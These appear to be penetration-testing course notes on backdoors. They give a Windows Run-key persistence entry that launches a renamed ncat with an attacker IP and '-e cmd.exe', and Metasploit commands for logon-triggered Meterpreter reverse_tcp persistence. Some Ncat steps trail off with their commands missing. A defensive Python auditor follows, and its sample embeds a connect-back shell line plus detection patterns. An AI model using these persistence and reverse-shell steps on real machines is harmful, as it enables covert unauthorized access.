Notes on system attacks from the ePTS course and other resources.
Classification:
🚪Backdoor
Ncat
Install it on the victim machine and run it with these commands:
-l: listen. -e: execute the file we choose (cmd), so we can execute commands.
attacker will
Ncat can also be run as a reverse connection, especially when the target is on another network:
On the attacker machine, listen:
-v: verbose, gives us output.
On the target machine:
Persistent Backdoor:
In the Windows Registry Editor, under `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`, add a string value for our ncat (or whatever we named it on the target machine) whose data is the command to run:
the path to ncat (here it is renamed winconfig) followed by {Attacker_IP} {Port} -e cmd.exe
Then restart the victim machine.
As soon as they log in, the attacker who is listening will get a shell.
Metasploit
Using Meterpreter (which is just like ncat above, but on steroids).
Meterpreter: a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code.
Get persistence on the target machine:
After hacking one machine you will already have a session, which you can browse with the sessions command:
```
use exploit/windows/local/s4u_persistence
sessions                                      //see all the sessions you have
set session <ID>                              //pick the session to make persistent
set trigger logon                             //whenever the target logs in you will get a connection
set payload windows/meterpreter/reverse_tcp   //whatever payload
                                              //same as the attack you used to gain access in the first place and get this session
set lhost <your_IP>
set lport <open_Port>
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
exploit
```
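Defender-side counterpart to the Run-key persistence described in the Ncat section above: an added example, not from the course or these notes, that parses a `reg export` of the Run key and flags values whose command line spawns a shell with -e/-c, carries an IP address and port, or runs from a user-writable folder. The sample export, the value names and the address 203.0.113.10 are constructed for the example.

```python
"""Audit an exported Run key for autorun entries that look like bound or reverse shells."""
import re

# Constructed sample of what `reg export` of the Run key produces: one benign
# entry and one renamed ncat launched with a connect-back address and -e cmd.exe.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Updater"="C:\\Program Files\\ExampleVendor\\Updater.exe /background"
"winconfig"="C:\\Users\\Public\\winconfig.exe 203.0.113.10 4444 -e cmd.exe"
'''

# ncat/nc -e or -c followed by a command interpreter: a shell bound to a socket.
SHELL_FLAG = re.compile(r"\s-[ec]\s+(cmd(\.exe)?|powershell(\.exe)?)\b", re.I)
# IPv4 address followed by a port: typical connect-back argument list.
IP_PORT = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b")
# Directories a legitimate autorun binary rarely lives in.
ODD_DIRS = re.compile(r"\\(Users\\Public|Temp|AppData\\Local\\Temp)\\", re.I)
# One "name"="data" line of a .reg file.
VALUE_LINE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')

def parse_run_values(reg_text):
    """Return {value_name: command_line} for every string value in the export."""
    values = {}
    for line in reg_text.splitlines():
        m = VALUE_LINE.match(line.strip())
        if m:
            # .reg files escape each backslash as '\\'; undo that before matching.
            values[m.group("name")] = m.group("data").replace("\\\\", "\\")
    return values

def suspicious_reasons(cmdline):
    """Explain why an autorun command line resembles the ncat backdoor pattern."""
    reasons = []
    if SHELL_FLAG.search(cmdline):
        reasons.append("spawns a command shell via -e/-c")
    if IP_PORT.search(cmdline):
        reasons.append("passes an IP address and port (connect-back)")
    if ODD_DIRS.search(cmdline):
        reasons.append("runs from a user-writable directory")
    return reasons

def audit_run_key(reg_text):
    """Map each Run value name to its findings; an empty list means nothing flagged."""
    return {name: suspicious_reasons(cmd) for name, cmd in parse_run_values(reg_text).items()}

if __name__ == "__main__":
    for name, reasons in audit_run_key(SAMPLE_REG_EXPORT).items():
        print(f"{name}: {'; '.join(reasons) or 'nothing flagged'}")
```

On a live host the same checks apply to the HKEY_CURRENT_USER Run key and to the scheduled task that the s4u_persistence module above creates, which this snippet does not cover.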